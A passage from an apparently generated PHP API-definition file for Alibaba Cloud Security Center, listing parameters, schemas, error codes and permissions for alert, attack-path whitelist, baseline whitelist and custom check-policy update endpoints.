=> [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '9D97AFC3-AA58-5B8F-BBC4-16D7D8AB****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9D97AFC3-AA58-5B8F-BBC4-16D7D8AB****\\"\\n}","type":"json"}]', 'title' => 'UninstallUniBackupAgent', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UninstallUniBackupAgent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:UninstallUniBackupAgent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateAlarmEvent' => [ 'summary' => 'Updates the status of the honeypot installation time.', 'methods' => ['post'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'AlarmEventIdList', 'in' => 'formData', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the alert event.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '945801', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'OperationCode', 'in' => 'formData', 'schema' => ['description' => 'The operation that you want to perform on the alert events. Valid values:'."\n" ."\n" .'* **manual_handled**: handle the alert events.'."\n" .'* **ignore**: igore the alert events.'."\n" .'* **cancel_ignore**: remove the alert events from the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ignore', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'formData', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'AC1E0E53-DEF3-5D96-B170-19130EA****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"AC1E0E53-DEF3-5D96-B170-19130EA****\\"\\n}","type":"json"}]', 'title' => 'UpdateAlarmEvent', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateAlarmEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateAlarmEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateAttackPathSensitiveAssetConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '237330', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'AttackPathAssetList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of cloud service assets for attack path analysis.', 'type' => 'array', 'items' => [ 'description' => 'The list of cloud service assets for attack path analysis.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The instance ID of the cloud service asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the instance ID of the cloud service asset.', 'type' => 'string', 'required' => true, 'example' => 'i-2ze357b4mrkwi7tq****', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '18', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '4', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the region ID of the cloud service asset instance.', 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'AttackPathSensitiveAssetConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the attack path sensitive asset configuration.', 'type' => 'string', 'required' => true, 'example' => 'apsac-123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'FD394AF6-591E-5168-8C8C-4C784736****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataExists', 'errorMessage' => 'data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Update attack path sensitive asset settings', 'summary' => 'Updates the sensitive asset configuration for attack path analysis.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateAttackPathSensitiveAssetConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathSensitiveAssetConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathsensitiveassetconfig/{#AttackPathSensitiveAssetConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"FD394AF6-591E-5168-8C8C-4C784736****\\"\\n}","type":"json"}]', ], 'UpdateAttackPathWhitelist' => [ 'summary' => 'Update Attack Path Whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226519', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'AttackPathAssetList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of cloud product assets in the attack path.', 'type' => 'array', 'items' => [ 'description' => 'List of cloud product assets in the attack path.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'Cloud product asset instance ID.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the cloud product asset instance ID.', 'type' => 'string', 'required' => false, 'example' => 'i-8vb0e8qdaj0yyxjo****'."\n", 'title' => ''], 'RegionId' => ['description' => 'Region ID of the cloud product asset instance.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the region ID of the cloud product asset instance.', 'type' => 'string', 'required' => false, 'example' => 'cn-shanghai', 'title' => ''], 'Vendor' => ['description' => 'Vendor of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the vendor of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'Type of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the type of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'AssetSubType' => ['description' => 'Subtype of the cloud product asset.'."\n" ."\n" .'> You can call [ListCloudAssetInstances](~~ListCloudAssetInstances~~) to query the subtype of the cloud product asset.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], 'NodeType' => ['description' => 'Node type, with values:'."\n" .'- **start**: Start point.'."\n" .'- **end**: End point.', 'type' => 'string', 'required' => false, 'example' => 'start', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'PathType', 'in' => 'query', 'schema' => ['description' => 'Path type.'."\n" .'> You can call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query the path type.', 'type' => 'string', 'required' => false, 'example' => 'role_escalation', 'title' => ''], ], [ 'name' => 'PathName', 'in' => 'query', 'schema' => ['description' => 'Path name.'."\n" ."\n" .'> You can call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query the path name.', 'type' => 'string', 'required' => false, 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], ], [ 'name' => 'WhitelistType', 'in' => 'query', 'schema' => ['description' => 'Whitelist type. Values:'."\n" ."\n" .'- **ALL_ASSET**: All assets'."\n" .'- **PART_ASSET**: Partial assets', 'type' => 'string', 'required' => false, 'example' => 'ALL_ASSET', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'Remark information.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'AttackPathWhitelistId', 'in' => 'query', 'schema' => ['description' => 'Attack path whitelist ID.'."\n" .'> You can call [ListAttackPathWhitelist](~~ListAttackPathWhitelist~~) to query the attack path whitelist ID.', 'type' => 'string', 'required' => true, 'example' => 'apwl-b33dec0acf9b42aabde032d656c0****', 'title' => ''], ], [ 'name' => 'WhitelistName', 'in' => 'query', 'schema' => ['description' => 'Whitelist name.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '898F7AA7-CECD-5EC7-AF4D-664C601B****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"898F7AA7-CECD-5EC7-AF4D-664C601B****\\"\\n}","type":"json"}]', 'title' => 'UpdateAttackPathWhitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateAttackPathWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathwhitelist/{#AttackPathWhitelistId}'], ], ], ], ], ], 'UpdateBaselineCheckWhiteRecord' => [ 'summary' => 'Updates a baseline whitelist record.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '196445', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> Call the [ListCheckItemWarningSummary](~~ListCheckItemWarningSummary~~) operation to obtain the check item ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16', 'title' => ''], ], [ 'name' => 'RecordId', 'in' => 'query', 'schema' => ['description' => 'The ID of the whitelist record.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '14', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Valid values:'."\n" .'- **default**: host'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The type of the target on which the whitelist takes effect. Valid values:'."\n" .'- **all_instance**: all servers'."\n" .'- **instance**: specific servers.', 'type' => 'string', 'required' => false, 'example' => 'all_instance', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason for adding the whitelist entry.', 'type' => 'string', 'required' => false, 'example' => 'Manually processed.'."\n", 'title' => ''], ], [ 'name' => 'RemoveContainerUuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of asset UUIDs for which container names are to be removed from the whitelist.', 'type' => 'array', 'items' => ['description' => 'The UUID of the asset for which the container name is to be removed from the whitelist.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '0e7aac1c-6536-43d1-9df8-73e2a65*****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'RecordId' => ['description' => 'The ID of the whitelist record.', 'type' => 'integer', 'format' => 'int64', 'example' => '1582', 'title' => ''], 'CheckId' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '92', 'title' => ''], 'TargetType' => ['description' => 'The type of the target on which the whitelist takes effect. Valid values:'."\n" .'- **all_instance**: all servers'."\n" .'- **instance**: specific servers.', 'type' => 'string', 'example' => 'instance', 'title' => ''], 'Target' => ['description' => 'The whitelisted target.', 'type' => 'string', 'example' => 'HOST_BASELINE_WHITE_LIST_23', 'title' => ''], 'Reason' => ['description' => 'The reason for adding the whitelist entry.', 'type' => 'string', 'example' => '暂可忽略', 'title' => ''], 'Source' => ['description' => 'The data source. Valid values:'."\n" .'- **default**: host'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'example' => 'agentless', 'title' => ''], 'Lang' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'example' => 'en', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Update a baseline whitelist record', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateBaselineCheckWhiteRecord'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateBaselineCheckWhiteRecord', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"RecordId\\": 1582,\\n \\"CheckId\\": 92,\\n \\"TargetType\\": \\"instance\\",\\n \\"Target\\": \\"HOST_BASELINE_WHITE_LIST_23\\",\\n \\"Reason\\": \\"暂可忽略\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Lang\\": \\"en\\"\\n },\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\"\\n}","type":"json"}]', ], 'UpdateCheckItem' => [ 'summary' => 'User creates a custom check item', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'SectionIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Array of section IDs associated with the check item.', 'type' => 'array', 'items' => ['description' => 'Section ID associated with the check item.'."\n" .'> You can call the [ListCheckPolicies](~~ListCheckPolicies~~) API to get this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1000000000001', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'Cloud asset vendor.'."\n" .'> You can call the [ListCloudAssetSchemas](~~ListCloudAssetSchemas~~) API to get the available vendors.', 'type' => 'string', 'required' => false, 'example' => 'ALIYUN', 'title' => ''], ], [ 'name' => 'InstanceType', 'in' => 'query', 'schema' => ['description' => 'Asset type of the cloud product.'."\n" .'> You can call the [ListCloudAssetSchemas](~~ListCloudAssetSchemas~~) API to get this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ECS', 'title' => ''], ], [ 'name' => 'InstanceSubType', 'in' => 'query', 'schema' => ['description' => 'Sub-asset type of the cloud product.'."\n" .'> You can call the [ListCloudAssetSchemas](~~ListCloudAssetSchemas~~) API to get this parameter.', 'type' => 'string', 'required' => false, 'example' => 'DISK', 'title' => ''], ], [ 'name' => 'CheckShowName', 'in' => 'query', 'schema' => ['description' => 'Name of the custom check item.', 'type' => 'string', 'required' => false, 'example' => 'testCheckItemName', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'Risk level of the check item. Values:'."\n" .'- **HIGH**: High risk'."\n" .'- **MEDIUM**: Medium risk'."\n" .'- **LOW**: Low risk', 'type' => 'string', 'required' => false, 'example' => 'high', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'Status of the check item. Values:'."\n" .'- **EDIT**: In editing'."\n" .'- **RELEASE**: Released'."\n" ."\n" .'> - Changing from **Released** to **In editing** will clear all historical records'."\n" .'> - Only the **Released** status allows the use of the check item for inspection.', 'type' => 'string', 'required' => false, 'example' => 'RELEASE', 'enum' => ['RELEASE', 'EDIT'], 'title' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'Remark information', 'type' => 'string', 'required' => false, 'example' => 'remark.', 'title' => ''], ], [ 'name' => 'Description', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Description of the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'Type of the check item description. Values:'."\n" ."\n" .'- **text**: Text', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'Description of the check item.', 'type' => 'string', 'required' => false, 'example' => 'custom description.'."\n", 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'AssistInfo', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Help information for the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'Type of the help information for the check item risk. Values:'."\n" ."\n" .'- **text**: Text', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'Content of the help information for the check item risk.', 'type' => 'string', 'required' => false, 'example' => 'custom assistInfo.'."\n", 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Solution', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Solution information for the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'Type of the solution information for the check item. Values:'."\n" ."\n" .'- **text**: Text', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'Content of the solution for the check item risk.', 'type' => 'string', 'required' => false, 'example' => 'custom solution.', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'CheckRule', 'in' => 'query', 'schema' => ['description' => 'Definition rule for the custom check item.', 'type' => 'string', 'required' => false, 'example' => '{"AssociatedData":{"ToDataList":[{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","FromPropertyPath":"InstanceId"}]},"MatchProperty":{"Operator":"AND","MatchProperties":[{"DataName":"ACS_ECS_Disk","PropertyPath":"InstanceId","MatchOperator":"EQ","MatchPropertyValue":"testId"},{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","MatchOperator":"EQ","MatchPropertyValue":"testInstanceId"}]}}', 'title' => ''], ], [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'ID of the custom check item to be updated.'."\n" .'> You can call the [ListCheckItems](~~ListCheckItems~~) API to get this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '10000000001', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Data body returned by the interface.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'ID of the current request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F****'], 'Data' => [ 'description' => 'Return data.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'ID of the updated check item.', 'type' => 'integer', 'format' => 'int64', 'example' => '10000000001', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => ''], ['errorCode' => 'CspmParamOverSize', 'errorMessage' => 'The parameter is too long.', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ['errorCode' => 'CspmCheckCustomItemSectionsError', 'errorMessage' => 'The chapter associated with the custom check item does not exist.', 'description' => ''], ['errorCode' => 'CspmUpdateCheckCustomItemStatusError', 'errorMessage' => 'Update custom check item status exception.', 'description' => ''], ['errorCode' => 'CspmVerifyItemRuleError.%s', 'errorMessage' => 'Audit check item check rule error: %s.', 'description' => ''], ['errorCode' => 'CspmUpdateCheckCustomItemError', 'errorMessage' => 'Failed to update custom check.', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F****\\",\\n \\"Data\\": {\\n \\"CheckId\\": 10000000001\\n }\\n}","type":"json"}]', 'title' => 'Update Custom Check Item', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCheckItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:UpdateCheckItem', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckItem', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckitem/{#customcheckitemId}'], ], ], ], ], ], 'UpdateCheckPolicy' => [ 'summary' => 'Update Custom Policy', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'ID of the custom policy.'."\n" .'> You can obtain this parameter by calling the [ListCheckPolicies](~~ListCheckPolicies~~) API.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1000000000001', 'title' => ''], ], [ 'name' => 'PolicyType', 'in' => 'query', 'schema' => ['description' => 'Classification type of the custom check item rule:'."\n" .'- **STANDARD**: Add to standard.'."\n" .'- **REQUIREMENT**: Add to requirement.'."\n" .'- **SECTION**: Add to section.', 'type' => 'string', 'required' => true, 'example' => 'STANDARD', 'title' => ''], ], [ 'name' => 'PolicyShowName', 'in' => 'query', 'schema' => ['description' => 'Name of the custom classification.', 'type' => 'string', 'required' => false, 'example' => 'testPolicyName', 'title' => ''], ], [ 'name' => 'DependentPolicyId', 'in' => 'query', 'schema' => ['description' => 'ID of the associated parent policy.'."\n" ."\n" .'(The specific dependency hierarchy, from low to high, is Section -> Requirement -> Standard).', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1000000000002', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'Name of the associated major policy category (required when PolicyType is STANDARD):'."\n" .'- **AISPM**: AI Configuration Management (AISPM).'."\n" .'- **RISK**: Security Risk.'."\n" .'- **COMPLIANCE**: Compliance Risk.', 'type' => 'string', 'required' => false, 'example' => 'AISPM', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The message structure returned by the interface.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this request, a unique identifier generated by Alibaba Cloud for this request, which can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****'], 'CheckCustomPolicy' => [ 'description' => 'Details of the custom policy.', 'type' => 'object', 'properties' => [ 'PolicyId' => ['description' => 'ID of the custom policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '100000000001', 'title' => ''], 'PolicyType' => ['description' => 'Policy type of the custom check item rule:'."\n" .'- **STANDARD**: Standard policy type.'."\n" .'- **REQUIREMENT**: Requirement policy type.'."\n" .'- **SECTION**: Section policy type.', 'type' => 'string', 'example' => 'STANDARD', 'title' => ''], 'PolicyShowName' => ['description' => 'Name of the custom policy.', 'type' => 'string', 'example' => 'testPolictName', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ['errorCode' => 'CspmUpdatePolicyNotExist', 'errorMessage' => 'Update policy does not exist.', 'description' => ''], ['errorCode' => 'CspmPolicyTypeNotExist', 'errorMessage' => 'The associated check criteria does not exist.', 'description' => ''], ['errorCode' => 'CspmDependentPolicyError', 'errorMessage' => 'The associated policy %s is missing.', 'description' => ''], ['errorCode' => 'CspmUpdatePolicyError', 'errorMessage' => 'Failed to update policy.', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\",\\n \\"CheckCustomPolicy\\": {\\n \\"PolicyId\\": 100000000001,\\n \\"PolicyType\\": \\"STANDARD\\",\\n \\"PolicyShowName\\": \\"testPolictName\\"\\n 